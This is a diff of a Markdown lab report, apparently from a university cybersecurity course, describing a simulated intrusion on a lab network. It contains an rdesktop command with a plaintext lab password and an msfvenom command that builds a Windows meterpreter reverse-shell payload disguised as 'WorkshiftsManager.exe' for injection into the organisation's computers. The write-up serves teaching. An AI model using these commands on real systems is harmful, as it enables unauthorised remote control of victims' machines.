AM311/Cybersecurity_Report/home.md

 	==VERIFICARE CHE SI POSSA FARE DESKTOP REMOTO==

  5. **Open a remote connection to `SERVERDNS`:**
 		To open a remote desktop connection, we use the following command:

     `rdesktop 10.0.2.250 -u DNSoperator -p Qwerty123 -d cybersec.units.it -r disk:share=~/Desktop/share`

 	Using the option `-r disk:share=~/Desktop/share` we can share the folder `share` between the Kali machine and the remote DNS/File Server, so we are able to easily move documents between the two devices.

- 6. **Generate of a payload for starting a reverse shell and inject it:**
+ 6. **Generate a payload for starting a reverse shell and inject it:**
 	In a different shell window, we now proceed with the generation of an exploit through which we will try to inject a `meterpreter` reverse shell client to the computers of the organization.
 For doing so, we run the following command on the Kali machine to generate a payload that launches the reverse shell client:

     `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/WorkshiftsManager.exe`